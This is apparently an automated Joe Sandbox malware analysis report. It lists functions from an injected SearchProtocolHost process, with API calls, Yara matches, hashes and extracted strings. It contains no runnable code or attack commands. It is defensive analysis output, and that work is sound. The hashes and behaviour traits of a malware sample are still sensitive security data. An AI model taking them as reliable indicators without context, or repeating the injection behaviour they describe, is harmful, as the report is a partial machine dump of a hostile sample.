                                                                                  • Instruction ID: 3fa642c8a62d2985b37c515db0617ca2344995997476e405d29b2230393c1926
                                                                                  • Opcode Fuzzy Hash: 400530205d2f2961724624f4ae92a75061138e33764b30bd387acbc83cf561cd
                                                                                  • Instruction Fuzzy Hash: BD90027131180803D140B5584804607000587D0302F55C011B7064555E8B798E916535
                                                                                  Function 03242D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a3725ce5ca5ecffa635808ef1c8fc7fbb2e796a8ad74a27f16afbad894756ad7
                                                                                  • Instruction ID: 4ceff65304228742ac9a2b1668577ce7f6d6902362cb22cdd1e6aa9ad8b1c58c
                                                                                  • Opcode Fuzzy Hash: a3725ce5ca5ecffa635808ef1c8fc7fbb2e796a8ad74a27f16afbad894756ad7
                                                                                  • Instruction Fuzzy Hash: FD90023131140403D140B15854186064005D7E1301F55D011F5414554CDA658A965622
                                                                                  Function 03242D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 59f1cda4ad701e2bbeb0c3e81105b7129cca87355220e5114fcd0eedf9158d3d
                                                                                  • Instruction ID: 9ee94f8be73c0f14f52e19a4608dfefe6c44b6d954f7aa19fd4de6286d2d6e3f
                                                                                  • Opcode Fuzzy Hash: 59f1cda4ad701e2bbeb0c3e81105b7129cca87355220e5114fcd0eedf9158d3d
                                                                                  • Instruction Fuzzy Hash: 1990023932340402D180B158540860A000587D1202F95D415B5015558CCA658AA95721
                                                                                  Function 03242DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f35e4aff9187128fbac6590d0203d37ee5a3183c1da8f41a3fa7a4b0ba26e934
                                                                                  • Instruction ID: 87188d0cc111a7c4633fa1ed0f6ead2aa16776a72273de16abe94c61021fef6a
                                                                                  • Opcode Fuzzy Hash: f35e4aff9187128fbac6590d0203d37ee5a3183c1da8f41a3fa7a4b0ba26e934
                                                                                  • Instruction Fuzzy Hash: 5990023131140813D111B1584504707000987D0241F95C412B5424558D97A68B92A521
                                                                                  Function 03242DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0a550c7773e906384c6bd33c0e2dae6942b18727ccb11e5eccfdb44609fe7519
                                                                                  • Instruction ID: a80ebbeb2c0e1347597de54dcd3c063d1bea36dfe9651eca4cb354d8054e564c
                                                                                  • Opcode Fuzzy Hash: 0a550c7773e906384c6bd33c0e2dae6942b18727ccb11e5eccfdb44609fe7519
                                                                                  • Instruction Fuzzy Hash: 83900231352445525545F1584404507400697E0241795C012B6414950C86769A96DA21
                                                                                  Function 03242C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 649045c93d8622ad8a3a4538594106df98bf0d0a4fba17f91f8ce3aebd88fa1a
                                                                                  • Instruction ID: 2d8c2263127b498cd1ae91d4e2b42e6027c96b1772f698c59919aca7b74a6b08
                                                                                  • Opcode Fuzzy Hash: 649045c93d8622ad8a3a4538594106df98bf0d0a4fba17f91f8ce3aebd88fa1a
                                                                                  • Instruction Fuzzy Hash: 4B90023131140C42D100B1584404B46000587E0301F55C016B5124654D8765CA917921
                                                                                  Function 03242C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 73539b7d5c443dd1559ddbf4843fc79a253db561a94ef6b7381d68e20de5e92a
                                                                                  • Instruction ID: 4ceeb7fcebc5ddac0dd3e66b39655fb151bcfd2e0fbc72b60fe7ee5bfb284f5b
                                                                                  • Opcode Fuzzy Hash: 73539b7d5c443dd1559ddbf4843fc79a253db561a94ef6b7381d68e20de5e92a
                                                                                  • Instruction Fuzzy Hash: 3490023131148C02D110B158840474A000587D0301F59C411B9424658D87E58AD17521
                                                                                  Function 03242CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 3a5ed440a3ddb9375983e1cecdc341502061bb6b37b108aa770044a78ac0062c
                                                                                  • Instruction ID: d2610ff7dd63c356d7e123f32626c6b1ff8fd62b409c0f88e2f22042a61fe24b
                                                                                  • Opcode Fuzzy Hash: 3a5ed440a3ddb9375983e1cecdc341502061bb6b37b108aa770044a78ac0062c
                                                                                  • Instruction Fuzzy Hash: 2190023131140802D100B5985408646000587E0301F55D011BA024555EC7B58AD16531
                                                                                  Function 032435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: cc6eab1a6d389c1453acb4d4ac1ffdf1969d2a616b3677ef161d79332955ab4c
                                                                                  • Instruction ID: 52ce926cc7d6a84a36ffbcbd434e3b23d2d026fe42005745fe8fca9fddddf862
                                                                                  • Opcode Fuzzy Hash: cc6eab1a6d389c1453acb4d4ac1ffdf1969d2a616b3677ef161d79332955ab4c
                                                                                  • Instruction Fuzzy Hash: 1390023171550802D100B1584514706100587D0201F65C411B5424568D87E58B9169A2
                                                                                  Function 032439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: ec231b047ea2c2ae6f52144e8059ef24d9cc0074833f9d67384f12a1e91c7015
                                                                                  • Instruction ID: 78dbc8b38080458021d8a5be0cb3aaa749f515a0573f6747f65d23f4f425024c
                                                                                  • Opcode Fuzzy Hash: ec231b047ea2c2ae6f52144e8059ef24d9cc0074833f9d67384f12a1e91c7015
                                                                                  • Instruction Fuzzy Hash: 4790023135545502D150B15C44046164005A7E0201F55C021B5814594D86A58A956621
                                                                                  Function 02A21098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 520 2a21098-2a210b0 521 2a210b9-2a2110e call 2a3c220 call 2a24820 call 2a113f0 call 2a31e20 520->521 522 2a210b4 call 2a3b810 520->522 531 2a21130-2a21135 521->531 532 2a21110-2a21121 PostThreadMessageW 521->532 522->521 532->531 533 2a21123-2a2112d 532->533 533->531
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 02A2111D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                  • API String ID: 1836367815-922563818
                                                                                  • Opcode ID: 48e7ce9b9e181d68542ed9ed000ddc066d33a657f703c3e008c8a651c3ee8e54
                                                                                  • Instruction ID: cecd12a76a4fe259f7f2041ea0b4c8f2d87615449163133122851222ac695399
                                                                                  • Opcode Fuzzy Hash: 48e7ce9b9e181d68542ed9ed000ddc066d33a657f703c3e008c8a651c3ee8e54
                                                                                  • Instruction Fuzzy Hash: A611C831D8025876DB21ABE49D42FEF7B799F41750F148054FA087B180DA7865068FE5
                                                                                  Function 02A210A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 02A2111D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                  • API String ID: 1836367815-922563818
                                                                                  • Opcode ID: f74383f6e5eaf82708ddbf861273db2c3e4f183863781a6df4847e7de21423d5
                                                                                  • Instruction ID: e9bb3e3206015f98be51e629d4db81c790796024e0de851a6764727f14c8e104
                                                                                  • Opcode Fuzzy Hash: f74383f6e5eaf82708ddbf861273db2c3e4f183863781a6df4847e7de21423d5
                                                                                  • Instruction Fuzzy Hash: 36019671D8125876EB21A7A49D41FDFBB7D9F41B50F048054FA087B180EBB866068FE5
                                                                                  Function 02A33C40 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 02A33D1B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: net.dll$wininet.dll
                                                                                  • API String ID: 3472027048-1269752229
                                                                                  • Opcode ID: 4c67e6583f4598c795b7771d79a1ab1b59f241d7e994d112dab766ddb8d5c6ba
                                                                                  • Instruction ID: d4aee6131e9378645fcab72500eb7548c236d31c3afe293083db98de056c6a78
                                                                                  • Opcode Fuzzy Hash: 4c67e6583f4598c795b7771d79a1ab1b59f241d7e994d112dab766ddb8d5c6ba
                                                                                  • Instruction Fuzzy Hash: 9B319170A44705BBD714EFA4C880FEABBB9EB88710F00455DF61D9B240C7746640CBE1
                                                                                  Function 02A2F72A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: a011dada001af0ab0cd32fa7fc1d6a62eca248bead56f5f1d02a8c9b41a19f63
                                                                                  • Instruction ID: 7d7d1fdbb53f4ff3caf1696c29824d49cfbdd0ea49c263ef1deab11c8f8bd4a4
                                                                                  • Opcode Fuzzy Hash: a011dada001af0ab0cd32fa7fc1d6a62eca248bead56f5f1d02a8c9b41a19f63
                                                                                  • Instruction Fuzzy Hash: 06310175A00609DFDB10DFD8D8809EFB7BABF88304B108559E515EB214DB75EE458BA0
                                                                                  Function 02A2F730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: ae9313da7f161ffccb725217d098db47be51ac62604412dc9d09675bbe1d632d
                                                                                  • Instruction ID: 9cd8b4a65dcb7dd026e8e335224dda5732bd83579515dc086fb992b315c14e92
                                                                                  • Opcode Fuzzy Hash: ae9313da7f161ffccb725217d098db47be51ac62604412dc9d09675bbe1d632d
                                                                                  • Instruction Fuzzy Hash: 0031F0B5A0060ADFDB10DFD8D8809EFB7BAFF88304B108559E515EB214DB75EE458BA0
                                                                                  Function 02A248DC Relevance: 1.6, APIs: 1, Instructions: 91libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A24892
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                                                  • Instruction ID: 295723f4c95cf5beae91e0cfeb97b3a2fff4f613b1081473039fbc12234541b2
                                                                                  • Opcode Fuzzy Hash: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                                                  • Instruction Fuzzy Hash: 9621217254864A9BC7019FFCD841BE4BBB4DF09224F104794DC68AB6E1EF305909C782
                                                                                  Function 02A24819 Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A24892
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                                                  • Instruction ID: b0f6242b2763bb44a7597d8263d5ffc39c2251dd063ca1b464adce3eaf12079b
                                                                                  • Opcode Fuzzy Hash: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                                                  • Instruction Fuzzy Hash: C601D8B5E50149ABDF11DBE4DC41FDDB7759F44318F0042A9E9189B281FA31E708CB91
                                                                                  Function 02A24820 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A24892
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                  • Instruction ID: 6183e798b32f91ed254ee76272213e8e93cb5a9f2f4c1afcff56e13b656cc507
                                                                                  • Opcode Fuzzy Hash: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                  • Instruction Fuzzy Hash: FC0121B5D4024DABDF10DBE4DD81FDEB7B99B44308F004595E908A7241FA31E758CB91
                                                                                  Function 02A39AC0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A285DE,00000010,?,?,?,00000044,?,00000010,02A285DE,?,?,?), ref: 02A39B23
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  • Opcode ID: 9ca81906a774322f318e096893a0ee57288e49d5298c7c64b5815489dfb80364
                                                                                  • Instruction ID: 570cf662ba192016592d512a13d4cb25b9fb5eaa17e5bbeec5b8b8af7279fd5d
                                                                                  • Opcode Fuzzy Hash: 9ca81906a774322f318e096893a0ee57288e49d5298c7c64b5815489dfb80364
                                                                                  • Instruction Fuzzy Hash: 5601D2B2210108BBCB04DF99DC80EDB77ADEF8C754F018208FA49E7240D630F8518BA4
                                                                                  Function 02A19E40 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A19E81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: 897b5008a066ca781a9f9edfdb1018c822e6dcf4366a4ba6e097ef57d074295b
                                                                                  • Instruction ID: 406124d044f49c8bcbb2ce5519b7029805075a0cae2f02aabace2512d30b1517
                                                                                  • Opcode Fuzzy Hash: 897b5008a066ca781a9f9edfdb1018c822e6dcf4366a4ba6e097ef57d074295b
                                                                                  • Instruction Fuzzy Hash: C2F0397228061436E72176ADAD02F9BA68ECB81BB1F240066FA0CEA1C0D996B4414AA5
                                                                                  Function 02A19E3E Relevance: 1.5, APIs: 1, Instructions: 31threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A19E81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: 9e635f60936242cedb424141fa78a542287fe07c6d5069c1c1935485f0b75a4b
                                                                                  • Instruction ID: 7c2f976fa4847a68181576ba99750f17fca045f7e46df56c3439258a32c61391
                                                                                  • Opcode Fuzzy Hash: 9e635f60936242cedb424141fa78a542287fe07c6d5069c1c1935485f0b75a4b
                                                                                  • Instruction Fuzzy Hash: 26E0927228060032E76176989D02FDB679E8FC4761F250046FA08AB1C0DDA5B4414EA5
                                                                                  Function 02A39A30 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,7CB0E851,00000007,00000000,00000004,00000000,02A240A6,000000F4), ref: 02A39A6F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                  • Instruction ID: 8ab32016936ae5c91f83fca365308008d746653f8d7856271533e1f9aed183ef
                                                                                  • Opcode Fuzzy Hash: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                  • Instruction Fuzzy Hash: 8EE065B22002587BCB10EE99DC41FEB37ADEFC9714F004419FA09A7241CA70B9108AB5
                                                                                  Function 02A399E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(02A21D39,?,02A35AD7,02A21D39,02A3582F,02A35AD7,?,02A21D39,02A3582F,00001000,?,?,00000000), ref: 02A39A1F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                                                  • Instruction ID: 9a2e5571943876892bfd88b3921761afe1bfd7f0951b8120788a9380799696b3
                                                                                  • Opcode Fuzzy Hash: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                                                  • Instruction Fuzzy Hash: B3E065B22403157BDB10EE99DC41FAB37ADEF89B64F004408FA49A7241DB70B9108BB5
                                                                                  Function 02A28620 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02A28648
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
